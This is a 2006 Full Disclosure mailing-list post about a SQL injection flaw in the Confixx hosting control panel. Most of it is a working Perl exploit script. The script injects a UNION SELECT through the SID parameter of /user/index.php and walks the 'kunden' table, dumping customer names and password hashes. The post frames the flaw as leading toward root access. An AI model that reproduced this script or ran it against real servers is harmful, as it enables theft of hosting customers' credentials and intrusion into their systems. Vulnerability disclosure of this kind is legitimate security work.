Full Disclosure mailing list archives
Confixx Index.PHP SQL Injection Vulnerability (Exploit - not new vuln)
From: defa <defa () systemli org>
Date: Wed, 19 Apr 2006 00:00:59 +0200
Here is more information on the confixx vuln released by LoK Crew. Sorry for the poor quality of this posting, I was short of time.
Product: ^^^^^^^Confixx is a comprehensive control panel that provides the best value, proven quality, fully developed feature set and quality support. The software’s powerful features have been especially designed to meet the requirements of hosting providers.
More -> http://www.swsoft.com/en/products/confixx/ Risk: High - eventually remote root access ^^^^ Serverity: High ^^^^^^^^ Discussion: ^^^^^^^^^^^The vuln itself can be found in the html/session.inc.php in the function sessao_read( $sKey ) which is used to overwrite the php-own session methods. The file "loginform.php" can be used to display e.g. admin hashes. Read the rest by studying the attached exploit.
Reference: ^^^^^^^^^^ Vuln was published by LoK-Crew here: http://venom.sam-city.com/confixx2.txt Read more: ^^^^^^^^^^^ http://www.securityfocus.com/bid/17476/ Code: ^^^^^ --------------- <snip> ------------- #!/usr/bin/perl use IO::Socket; if (@ARGV < 1) { print q( exploit by defa (2006) ========================= confixx_exploit.pl [URL] params: [URL] - server url ); exit; } $serv = $ARGV[0]; $serv =~ s/(http:\/\/)//eg; for ($i=0;$i<=100;$i++) { #$i=1; $hit = 0; $url = "http://"; $url .= $serv; $url .= "/user/index.php?SID=1'%20AND%200=1%20UNION%20SELECT%20CONCAT";$url .= "('_error|s:',length(longpw)%2Blength(kunde)%2B8,':%22','HIT:% 20',"; $url .= "kunde,'%20:%20',longpw,'%22;')%20AS%20'sdata'%20FROM%20kunden %20LIMIT%20";
$url .= "$i,1/*";$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "localhost", PeerPort => "80") || die "[-] CONNECT FAILED\r\n";
print $socket "GET $url HTTP/1.1\n"; print $socket "Host: $serv\n"; print $socket 'User-Agent: confixx_exploit'."\n"; print $socket "Connection: close\n\n"; while ($answer = <$socket>) { if ($answer =~ /<p>HIT:/) { # $answer =~ s/<[A-Z,a-z,=].+>//g; print "$answer"; $hit = 1; } } if ($hit == 0) {die("that's it");} } --------------- <snap> ------------- bye defa -- don't eat yellow snow _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Confixx Index.PHP SQL Injection Vulnerability (Exploit - not new vuln) defa (Apr 18)
- Re: Confixx Index.PHP SQL ... UPDATE defa (Apr 18)
- Re: Confixx Index.PHP SQL Injection Vulnerability (Exploit - not new vuln) defa (Apr 19)